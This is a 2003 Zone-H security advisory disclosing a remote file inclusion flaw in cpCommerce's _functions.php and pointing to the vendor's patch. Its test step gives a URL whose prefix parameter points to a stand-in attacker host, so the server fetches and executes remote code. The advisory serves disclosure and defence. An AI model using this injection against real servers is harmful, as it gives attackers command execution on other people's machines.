ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce Published: 19 October 2003 Name: cpCommerce Affected Versions: 0.05f (and other versions?) Vendor: http://www.cpcommerce.org Issue: file inclusion vulnerability Author: Astharot (at Zone-H.org) Description ********** Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an open-source e-commerce solution that is entirely template and module based.". Details ********** There's a file inclusion vulnerability in the _functions.php file, line 13-14: require_once("{$prefix}_config.php"); require_once("{$prefix}_gateways.php"); Is it possible for a remote attacker to include an external file and execute arbitrary commands with the privileges of the webserver (nobody by default). To test the vulnerability try this: http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http:// www.attacker.com/index In this way the file "http://www.attacker.com/index_config.php" or "http://www.attacker.com/index_gateways.php" will be included and executed on the server. Solution ********** The author has been contacted and he published a temporary fix in the cpCommerce website forum, waiting for the new version. The patch is avaible here: http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=8 64. Suggestions ********** Fix the script with the patch proposed by the author. Link to ariginal article here: http://www.zone-h.org/en/advisories/read/id=3284/ Astharot - Zone-H Admin -- http://www.zone-h.org - astharot (at) zone-h (dot) org [email concealed] PGP Key: http://www.gife.org/astharot.asc Linux User #292132